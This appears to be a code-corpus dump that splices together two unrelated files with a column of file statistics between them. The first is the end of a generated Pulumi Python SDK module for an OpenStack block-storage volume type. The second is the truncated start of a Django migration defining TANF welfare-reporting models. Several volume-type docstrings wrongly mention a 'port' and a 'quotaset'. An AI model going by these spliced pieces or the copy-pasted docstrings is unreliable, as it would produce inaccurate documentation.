    def extra_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Key/Value pairs of metadata for the volume type.
        """
        return pulumi.get(self, "extra_specs")
    @extra_specs.setter
    def extra_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "extra_specs", value)
    @property
    @pulumi.getter(name="isPublic")
    def is_public(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the volume type is public. Changing
        this updates the `is_public` of an existing volume type.
        """
        return pulumi.get(self, "is_public")
    @is_public.setter
    def is_public(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_public", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the volume type. Changing this
        updates the `name` of an existing volume type.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def region(self) -> Optional[pulumi.Input[str]]:
        """
        The region in which to create the volume. If
        omitted, the `region` argument of the provider is used. Changing this
        creates a new quotaset.
        """
        return pulumi.get(self, "region")
    @region.setter
    def region(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "region", value)
@pulumi.input_type
class _VolumeTypeV3State:
    """Full output-state bag used by ``VolumeTypeV3.get`` to look up / filter resources."""
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 extra_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 is_public: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 region: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering VolumeTypeV3 resources.
        :param pulumi.Input[str] description: Human-readable description of the port. Changing
               this updates the `description` of an existing volume type.
        :param pulumi.Input[Mapping[str, Any]] extra_specs: Key/Value pairs of metadata for the volume type.
        :param pulumi.Input[bool] is_public: Whether the volume type is public. Changing
               this updates the `is_public` of an existing volume type.
        :param pulumi.Input[str] name: Name of the volume type. Changing this
               updates the `name` of an existing volume type.
        :param pulumi.Input[str] region: The region in which to create the volume. If
               omitted, the `region` argument of the provider is used. Changing this
               creates a new quotaset.
        """
        # Register only explicitly-provided values; unset state fields stay
        # absent so the lookup does not filter on them.
        if description is not None:
            pulumi.set(__self__, "description", description)
        if extra_specs is not None:
            pulumi.set(__self__, "extra_specs", extra_specs)
        if is_public is not None:
            pulumi.set(__self__, "is_public", is_public)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if region is not None:
            pulumi.set(__self__, "region", region)
    # Accessors mirror VolumeTypeV3Args: pulumi.get/pulumi.set delegation with
    # @pulumi.getter(name=...) supplying the provider's camelCase key names.
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Human-readable description of the port. Changing
        this updates the `description` of an existing volume type.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="extraSpecs")
    def extra_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Key/Value pairs of metadata for the volume type.
        """
        return pulumi.get(self, "extra_specs")
    @extra_specs.setter
    def extra_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "extra_specs", value)
    @property
    @pulumi.getter(name="isPublic")
    def is_public(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the volume type is public. Changing
        this updates the `is_public` of an existing volume type.
        """
        return pulumi.get(self, "is_public")
    @is_public.setter
    def is_public(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_public", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the volume type. Changing this
        updates the `name` of an existing volume type.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def region(self) -> Optional[pulumi.Input[str]]:
        """
        The region in which to create the volume. If
        omitted, the `region` argument of the provider is used. Changing this
        creates a new quotaset.
        """
        return pulumi.get(self, "region")
    @region.setter
    def region(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "region", value)
class VolumeTypeV3(pulumi.CustomResource):
    """Pulumi resource managing an OpenStack Cinder V3 block-storage volume type."""
    # The two @overload stubs below only document the alternative call
    # signatures (plain keyword args vs. a VolumeTypeV3Args bag); the real
    # __init__ further down dispatches between them at runtime.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 extra_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 is_public: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 region: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a V3 block storage volume type resource within OpenStack.
        > **Note:** This usually requires admin privileges.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_openstack as openstack
        volume_type1 = openstack.blockstorage.VolumeTypeV3("volumeType1",
            description="Volume type 1",
            extra_specs={
                "capabilities": "gpu",
                "volume_backend_name": "ssd",
            })
        ```
        ## Import
        Volume types can be imported using the `volume_type_id`, e.g.
        ```sh
        $ pulumi import openstack:blockstorage/volumeTypeV3:VolumeTypeV3 volume_type_1 941793f0-0a34-4bc4-b72e-a6326ae58283
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: Human-readable description of the port. Changing
               this updates the `description` of an existing volume type.
        :param pulumi.Input[Mapping[str, Any]] extra_specs: Key/Value pairs of metadata for the volume type.
        :param pulumi.Input[bool] is_public: Whether the volume type is public. Changing
               this updates the `is_public` of an existing volume type.
        :param pulumi.Input[str] name: Name of the volume type. Changing this
               updates the `name` of an existing volume type.
        :param pulumi.Input[str] region: The region in which to create the volume. If
               omitted, the `region` argument of the provider is used. Changing this
               creates a new quotaset.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: Optional[VolumeTypeV3Args] = None,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a V3 block storage volume type resource within OpenStack.
        > **Note:** This usually requires admin privileges.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_openstack as openstack
        volume_type1 = openstack.blockstorage.VolumeTypeV3("volumeType1",
            description="Volume type 1",
            extra_specs={
                "capabilities": "gpu",
                "volume_backend_name": "ssd",
            })
        ```
        ## Import
        Volume types can be imported using the `volume_type_id`, e.g.
        ```sh
        $ pulumi import openstack:blockstorage/volumeTypeV3:VolumeTypeV3 volume_type_1 941793f0-0a34-4bc4-b72e-a6326ae58283
        ```
        :param str resource_name: The name of the resource.
        :param VolumeTypeV3Args args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher for the two overloads: the SDK helper inspects
        # *args/**kwargs and returns a VolumeTypeV3Args instance when the
        # args-object form was used, else None.
        resource_args, opts = _utilities.get_resource_args_opts(VolumeTypeV3Args, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            # Args-object form: splat the bag's attributes into keyword args.
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 extra_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 is_public: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 region: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """Shared implementation behind both ``__init__`` overloads; validates
        options, builds the property bag, and registers the resource."""
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # opts.id is only set when rehydrating an existing resource (see
        # get()); in that path the engine supplies state, so building a
        # fresh property bag here would be invalid.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            # __new__ bypasses VolumeTypeV3Args.__init__ so unset inputs can
            # be written straight into __dict__ without the is-not-None
            # filtering the constructor performs.
            __props__ = VolumeTypeV3Args.__new__(VolumeTypeV3Args)
            __props__.__dict__["description"] = description
            __props__.__dict__["extra_specs"] = extra_specs
            __props__.__dict__["is_public"] = is_public
            __props__.__dict__["name"] = name
            __props__.__dict__["region"] = region
        super(VolumeTypeV3, __self__).__init__(
            'openstack:blockstorage/volumeTypeV3:VolumeTypeV3',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            description: Optional[pulumi.Input[str]] = None,
            extra_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
            is_public: Optional[pulumi.Input[bool]] = None,
            name: Optional[pulumi.Input[str]] = None,
            region: Optional[pulumi.Input[str]] = None) -> 'VolumeTypeV3':
        """
        Get an existing VolumeTypeV3 resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: Human-readable description of the port. Changing
               this updates the `description` of an existing volume type.
        :param pulumi.Input[Mapping[str, Any]] extra_specs: Key/Value pairs of metadata for the volume type.
        :param pulumi.Input[bool] is_public: Whether the volume type is public. Changing
               this updates the `is_public` of an existing volume type.
        :param pulumi.Input[str] name: Name of the volume type. Changing this
               updates the `name` of an existing volume type.
        :param pulumi.Input[str] region: The region in which to create the volume. If
               omitted, the `region` argument of the provider is used. Changing this
               creates a new quotaset.
        """
        # Merging id into opts tells the engine to rehydrate the existing
        # resource rather than create a new one.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _VolumeTypeV3State.__new__(_VolumeTypeV3State)
        __props__.__dict__["description"] = description
        __props__.__dict__["extra_specs"] = extra_specs
        __props__.__dict__["is_public"] = is_public
        __props__.__dict__["name"] = name
        __props__.__dict__["region"] = region
        return VolumeTypeV3(resource_name, opts=opts, __props__=__props__)
    # Read-only Output properties exposing the resource's live state.
    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[str]:
        """
        Human-readable description of the port. Changing
        this updates the `description` of an existing volume type.
        """
        return pulumi.get(self, "description")
    @property
    @pulumi.getter(name="extraSpecs")
    def extra_specs(self) -> pulumi.Output[Mapping[str, Any]]:
        """
        Key/Value pairs of metadata for the volume type.
        """
        return pulumi.get(self, "extra_specs")
    @property
    @pulumi.getter(name="isPublic")
    def is_public(self) -> pulumi.Output[bool]:
        """
        Whether the volume type is public. Changing
        this updates the `is_public` of an existing volume type.
        """
        return pulumi.get(self, "is_public")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Name of the volume type. Changing this
        updates the `name` of an existing volume type.
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter
    def region(self) -> pulumi.Output[str]:
        """
        The region in which to create the volume. If
        omitted, the `region` argument of the provider is used. Changing this
        creates a new quotaset.
        """
        return pulumi.get(self, "region")
| 40.183771
| 134
| 0.62422
| 1,969
| 16,837
| 5.158964
| 0.089893
| 0.074719
| 0.08417
| 0.058476
| 0.838452
| 0.824769
| 0.814727
| 0.80695
| 0.80193
| 0.792282
| 0
| 0.006828
| 0.278078
| 16,837
| 418
| 135
| 40.279904
| 0.828877
| 0.384095
| 0
| 0.777228
| 1
| 0
| 0.07323
| 0.005262
| 0
| 0
| 0
| 0
| 0
| 1
| 0.158416
| false
| 0.004951
| 0.024752
| 0
| 0.277228
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b3ee32b9bdbb47c6d99df9592416ba39bf94cfdd
| 41,169
|
py
|
Python
|
upload/migrations/0001_initial.py
|
shubhi-raft/TANF-app
|
f07a4292a3dd208378014935366eafd138d28ace
|
[
"CC0-1.0"
] | 1
|
2020-05-08T19:55:07.000Z
|
2020-05-08T19:55:07.000Z
|
upload/migrations/0001_initial.py
|
shubhi-raft/TANF-app
|
f07a4292a3dd208378014935366eafd138d28ace
|
[
"CC0-1.0"
] | 4
|
2021-04-08T19:55:25.000Z
|
2021-06-10T20:16:46.000Z
|
upload/migrations/0001_initial.py
|
shubhi-raft/TANF-app
|
f07a4292a3dd208378014935366eafd138d28ace
|
[
"CC0-1.0"
] | 1
|
2021-02-04T11:09:44.000Z
|
2021-02-04T11:09:44.000Z
|
# Generated by Django 2.2.7 on 2019-12-10 23:13
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Adult',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('valid', models.BooleanField(default=True, verbose_name='has record passed validation checks')),
('invalidreason', models.CharField(default='', max_length=1024, verbose_name='Reason(s) why record did not pass validation. (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T2)')),
('reportingmonth', models.CharField(max_length=6, verbose_name='reporting month (item 4)')),
('casenumber', models.CharField(max_length=11, verbose_name='case number (item 6)')),
('familyafilliation', models.IntegerField(verbose_name='family affiliation (item 30)')),
('noncustodialparent', models.IntegerField(verbose_name='noncustodial parent (item 31)')),
('dateofbirth', models.DateField(verbose_name='date of birth (item 32)')),
('socialsecuritynumber', models.CharField(max_length=9, verbose_name='social security number (item 33)')),
('racehispanic', models.CharField(max_length=1, verbose_name='race/ethnicity: hispanic or latino (item 34a)')),
('racenativeamerican', models.CharField(max_length=1, verbose_name='race/ethnicity: american indian or alaska native (item 34b)')),
('raceasian', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: asian (item 34c)')),
('raceblack', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: black or african american (item 34d)')),
('raceislander', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: islander (item 34e)')),
('racewhite', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: white (item 34f)')),
('gender', models.IntegerField(default=0, verbose_name='gender (item 35)')),
('oasdibenefits', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: received federal disability insurance benefits under the oasdi program (item 36a)')),
('nonssabenefits', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: receives benefits based on federal disability status under non-ssa programs (item 36b)')),
('titlexivapdtbenefits', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: received aid to the permanently and totally disabled under title xiv-apdt (item 36c)')),
('titlexviaabdbenefits', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: received aid to the aged, blind, and disabled under title xvi-aabd (item 36d)')),
('titlexvissibenefits', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: received ssi under title xvi-ssi (item 36e)')),
('maritalstatus', models.CharField(default='', max_length=1, verbose_name='marital status (item 37)')),
('relationshiptohh', models.IntegerField(default=0, verbose_name='relationship to head of household (item 38)')),
('parentminorchild', models.CharField(default='', max_length=1, verbose_name='parent with minor child in the family (item 39)')),
('pregnantneeds', models.CharField(default='', max_length=1, verbose_name='needs of a pregnant woman (item 40)')),
('educationlevel', models.CharField(default='', max_length=2, verbose_name='education level (item 41)')),
('citizenship', models.CharField(default='', max_length=1, verbose_name='citizenship/alienage (item 42)')),
('coopwithchildsupport', models.CharField(default='', max_length=1, verbose_name='cooperation with child support (item 43)')),
('countablemonths', models.CharField(default='', max_length=3, verbose_name='number of countable months toward federal time limit (item 44)')),
('countablemonthsremaining', models.CharField(default='', max_length=2, verbose_name='number of countable months remaining under state/tribe limit (item 45)')),
('currentmonthexempt', models.CharField(default='', max_length=1, verbose_name='current month exempt from state tribe time-limit (item 46)')),
('employmentstatus', models.CharField(default='', max_length=1, verbose_name='employment status (item 47)')),
('workeligibleindicator', models.CharField(default='', max_length=2, verbose_name='work eligible individual indicator (item 48)')),
('workparticipationstatus', models.CharField(default='', max_length=2, verbose_name='work participation status (item 49)')),
('unsubsidizedemployment', models.CharField(default='', max_length=2, verbose_name='unsubsidized employment (item 50)')),
('subsidizedprivateemployment', models.CharField(default='', max_length=2, verbose_name='subsidized private employment (item 51)')),
('subsidizedpublicemployment', models.CharField(default='', max_length=2, verbose_name='subsidized public employment (item 52)')),
('workexperiencehours', models.CharField(default='', max_length=2, verbose_name='work experience: hours of participation (item 53a)')),
('workexperienceexcusedabsences', models.CharField(default='', max_length=2, verbose_name='work experience: excused absences (item 53b)')),
('workexperienceholidays', models.CharField(default='', max_length=2, verbose_name='work experience: holidays (item 53c)')),
('onthejobtraining', models.CharField(default='', max_length=2, verbose_name='on the job training (item 54)')),
('jobsearchhours', models.CharField(default='', max_length=2, verbose_name='job search & job readiness: hours of participation (item 55a)')),
('jobsearchexcusedabsences', models.CharField(default='', max_length=2, verbose_name='job search & job readiness: excused absences (item 55b)')),
('jobsearchholidays', models.CharField(default='', max_length=2, verbose_name='job search & job readiness: holidays (item 55c)')),
('communitysvchours', models.CharField(default='', max_length=2, verbose_name='community svs prog: hours of participation (item 56a)')),
('communitysvcexcusedabsences', models.CharField(default='', max_length=2, verbose_name='community svs prog: excused absences (item 56b)')),
('communitysvcholidays', models.CharField(default='', max_length=2, verbose_name='community svs prog: holidays (item 56c)')),
('vocationaltraininghours', models.CharField(default='', max_length=2, verbose_name='vocational education training: hours of participation (item 57a)')),
('vocationaltrainingexcusedabsences', models.CharField(default='', max_length=2, verbose_name='vocational education training: excused absences (item 57b)')),
('vocationaltrainingholidays', models.CharField(default='', max_length=2, verbose_name='vocational education training: holidays (item 57c)')),
('jobskillshours', models.CharField(default='', max_length=2, verbose_name='job skills training employment related: hours of participation (item 58a)')),
('jobskillsexcusedabsences', models.CharField(default='', max_length=2, verbose_name='job skills training employment related: excused absences (item 58b)')),
('jobskillsholidays', models.CharField(default='', max_length=2, verbose_name='job skills training employment related: holidays (item 58c)')),
('eduwithnodiplomahours', models.CharField(default='', max_length=2, verbose_name='education related to employment with no high school diploma: hours of participation (item 59a)')),
('eduwithnodiplomaexcusedabsences', models.CharField(default='', max_length=2, verbose_name='education related to employment with no high school diploma: excused absences (item 59b)')),
('eduwithnodiplomaholidays', models.CharField(default='', max_length=2, verbose_name='education related to employment with no high school diploma: holidays (item 59c)')),
('satisfactoryschoolhours', models.CharField(default='', max_length=2, verbose_name='satisfactory school attendance: hours of participation (item 60a)')),
('satisfactoryschoolexcusedabsences', models.CharField(default='', max_length=2, verbose_name='satisfactory school attendance: excused absences (item 60b)')),
('satisfactoryschoolholidays', models.CharField(default='', max_length=2, verbose_name='satisfactory school attendance: holidays (item 60c)')),
('providingchildcarehours', models.CharField(default='', max_length=2, verbose_name='providing child care: hours of participation (item 61a)')),
('providingchildcareexcusedabsences', models.CharField(default='', max_length=2, verbose_name='providing child care: excused absences (item 61b)')),
('providingchildcareholidays', models.CharField(default='', max_length=2, verbose_name='providing child care: holidays (item 61c)')),
('otherwork', models.CharField(default='', max_length=2, verbose_name='other work activities (item 62)')),
('corehoursforoverallrate', models.CharField(default='', max_length=2, verbose_name='number of deemed core hours for overall rate (item 63)')),
('corehoursfortwoparentrate', models.CharField(default='', max_length=2, verbose_name='number of deemed core hours for the two-parent rate (item 64)')),
('earnedincome', models.CharField(default='', max_length=4, verbose_name='amount of earned income (item 65)')),
('unearnedincomeincometaxcredit', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: earned income tax credit (item 66a)')),
('unearnedincomesocialsecurity', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: social security (item 66b)')),
('unearnedincomessi', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: SSI (item 66c)')),
('unearnedincomeworkerscomp', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: workers compensation (item 66d)')),
('unearnedincomeother', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: other unearned income (item 66e)')),
],
),
migrations.CreateModel(
name='AggregatedData',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('valid', models.BooleanField(default=True, verbose_name='has record passed validation checks')),
('invalidreason', models.CharField(default='', max_length=1024, verbose_name='Reason(s) why record did not pass validation. (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T6)')),
('calendaryear', models.IntegerField(verbose_name='calendar year (item 3)')),
('calendarquarter', models.IntegerField(verbose_name='calendar quarter (item 3)')),
('firstmonthapps', models.IntegerField(verbose_name='total number of applicants: first month (item 4)')),
('secondmonthapps', models.IntegerField(verbose_name='total number of applicants: second month (item 4)')),
('thirdmonthapps', models.IntegerField(verbose_name='total number of applicants: third month (item 4)')),
('firstmonthapprovals', models.IntegerField(verbose_name='total number of approved applications: first month (item 5)')),
('secondmonthapprovals', models.IntegerField(verbose_name='total number of approved applications: second month (item 5)')),
('thirdmonthapprovals', models.IntegerField(verbose_name='total number of approved applications: third month (item 5)')),
('firstmonthdenied', models.IntegerField(verbose_name='total number of denied applications: first month (item 6)')),
('secondmonthdenied', models.IntegerField(verbose_name='total number of denied applications: second month (item 6)')),
('thirdmonthdenied', models.IntegerField(verbose_name='total number of denied applications: third month (item 6)')),
('firstmonthassist', models.IntegerField(default=0, verbose_name='total amount of assistance: first month (item 7)')),
('secondmonthassist', models.IntegerField(default=0, verbose_name='total amount of assistance: second month (item 7)')),
('thirdmonthassist', models.IntegerField(default=0, verbose_name='total amount of assistance: third month (item 7)')),
],
),
migrations.CreateModel(
name='Child',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('valid', models.BooleanField(default=True, verbose_name='has record passed validation checks')),
('invalidreason', models.CharField(default='', max_length=1024, verbose_name='Reason(s) why record did not pass validation. (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T3)')),
('reportingmonth', models.CharField(max_length=6, verbose_name='reporting month (item 4)')),
('casenumber', models.CharField(max_length=11, verbose_name='case number (item 6)')),
('familyafilliation_1', models.IntegerField(default=0, verbose_name='family affiliation1: Child 1,3,5,7,9 (item 67)')),
('dateofbirth_1', models.DateField(verbose_name='date of birth (item 68)')),
('socialsecuritynumber_1', models.CharField(default='', max_length=9, verbose_name='social security number (item 69)')),
('racehispanic_1', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: hispanic or latino (item 70a)')),
('racenativeamerican_1', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: american indian or alaska native (item 70b)')),
('raceasian_1', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: asian (item 70c)')),
('raceblack_1', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: black or african american islander (item 70d)')),
('racepacific_1', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: native hawaiian or other pacific islander (item 70e)')),
('racewhite_1', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: white (item 70f)')),
('gender_1', models.IntegerField(default=0, verbose_name='gender (item 71)')),
('nonssabenefits_1', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: receives benefits based on federal disability status under non-ssa programs (item 72a)')),
('titlexvissibenefits_1', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: received ssi under title xvi-ssi (item 72b)')),
('relationshiptohh_1', models.IntegerField(default=0, verbose_name='relationship to head of household (item 73)')),
('parentminorchild_1', models.CharField(default='', max_length=1, verbose_name='parent with minor child in the family (item 74)')),
('educationlevel_1', models.CharField(default='', max_length=12, verbose_name='education level (item 75)')),
('citizenship_1', models.CharField(default='', max_length=1, verbose_name='citizenship/alienage (item 76)')),
('unearnedincomessi_1', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: SSI (item 77a)')),
('unearnedincomeother_1', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: other unearned income (item 77b)')),
('familyafilliation_2', models.IntegerField(default=0, verbose_name='family affiliation 2: Child 2,4,6,8,10 (item 67)')),
('dateofbirth_2', models.DateField(default=datetime.date.today, verbose_name='date of birth (item 68)')),
('socialsecuritynumber_2', models.CharField(default='', max_length=9, verbose_name='social security number (item 69)')),
('racehispanic_2', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: hispanic or latino (item 70a)')),
('racenativeamerican_2', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: american indian or alaska native (item 70b)')),
('raceasian_2', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: asian (item 70c)')),
('raceblack_2', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: black or african american islander (item 70d)')),
('racepacific_2', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: native hawaiian or other pacific islander (item 70e)')),
('racewhite_2', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: white (item 70f)')),
('gender_2', models.IntegerField(default=0, verbose_name='gender (item 71)')),
('nonssabenefits_2', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: receives benefits based on federal disability status under non-ssa programs (item 72a)')),
('titlexvissibenefits_2', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: received ssi under title xvi-ssi (item 72b)')),
('relationshiptohh_2', models.IntegerField(default=0, verbose_name='relationship to head of household (item 73)')),
('parentminorchild_2', models.CharField(default='', max_length=1, verbose_name='parent with minor child in the family (item 74)')),
('educationlevel_2', models.CharField(default='', max_length=12, verbose_name='education level (item 75)')),
('citizenship_2', models.CharField(default='', max_length=1, verbose_name='citizenship/alienage (item 76)')),
('unearnedincomessi_2', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: SSI (item 77a)')),
('unearnedincomeother_2', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: other unearned income (item 77b)')),
('jobsearchhours', models.CharField(default='', max_length=2, verbose_name='job search & job readiness: hours of participation (item 55a)')),
('jobsearchexcusedabsences', models.CharField(default='', max_length=2, verbose_name='job search & job readiness: excused absences (item 55b)')),
('jobsearchholidays', models.CharField(default='', max_length=2, verbose_name='job search & job readiness: holidays (item 55c)')),
('communitysvchours', models.CharField(default='', max_length=2, verbose_name='community svs prog: hours of participation (item 56a)')),
('communitysvcexcusedabsences', models.CharField(default='', max_length=2, verbose_name='community svs prog: excused absences (item 56b)')),
('communitysvcholidays', models.CharField(default='', max_length=2, verbose_name='community svs prog: holidays (item 56c)')),
('vocationaltraininghours', models.CharField(default='', max_length=2, verbose_name='vocational education training: hours of participation (item 57a)')),
('vocationaltrainingexcusedabsences', models.CharField(default='', max_length=2, verbose_name='vocational education training: excused absences (item 57b)')),
('vocationaltrainingholidays', models.CharField(default='', max_length=2, verbose_name='vocational education training: holidays (item 57c)')),
('jobskillshours', models.CharField(default='', max_length=2, verbose_name='job skills training employment related: hours of participation (item 58a)')),
('jobskillsexcusedabsences', models.CharField(default='', max_length=2, verbose_name='job skills training employment related: excused absences (item 58b)')),
('jobskillsholidays', models.CharField(default='', max_length=2, verbose_name='job skills training employment related: holidays (item 58c)')),
('eduwithnodiplomahours', models.CharField(default='', max_length=2, verbose_name='education related to employment with no high school diploma: hours of participation (item 59a)')),
('eduwithnodiplomaexcusedabsences', models.CharField(default='', max_length=2, verbose_name='education related to employment with no high school diploma: excused absences (item 59b)')),
('eduwithnodiplomaholidays', models.CharField(default='', max_length=2, verbose_name='education related to employment with no high school diploma: holidays (item 59c)')),
('satisfactoryschoolhours', models.CharField(default='', max_length=2, verbose_name='satisfactory school attendance: hours of participation (item 60a)')),
('satisfactoryschoolexcusedabsences', models.CharField(default='', max_length=2, verbose_name='satisfactory school attendance: excused absences (item 60b)')),
('satisfactoryschoolholidays', models.CharField(default='', max_length=2, verbose_name='satisfactory school attendance: holidays (item 60c)')),
('providingchildcarehours', models.CharField(default='', max_length=2, verbose_name='providing child care: hours of participation (item 61a)')),
('providingchildcareexcusedabsences', models.CharField(default='', max_length=2, verbose_name='providing child care: excused absences (item 61b)')),
('providingchildcareholidays', models.CharField(default='', max_length=2, verbose_name='providing child care: holidays (item 61c)')),
('otherwork', models.CharField(default='', max_length=2, verbose_name='other work activities (item 62)')),
('corehoursforoverallrate', models.CharField(default='', max_length=2, verbose_name='number of deemed core hours for overall rate (item 63)')),
('corehoursfortwoparentrate', models.CharField(default='', max_length=2, verbose_name='number of deemed core hours for the two-parent rate (item 64)')),
('earnedincome', models.CharField(default='', max_length=4, verbose_name='amount of earned income (item 65)')),
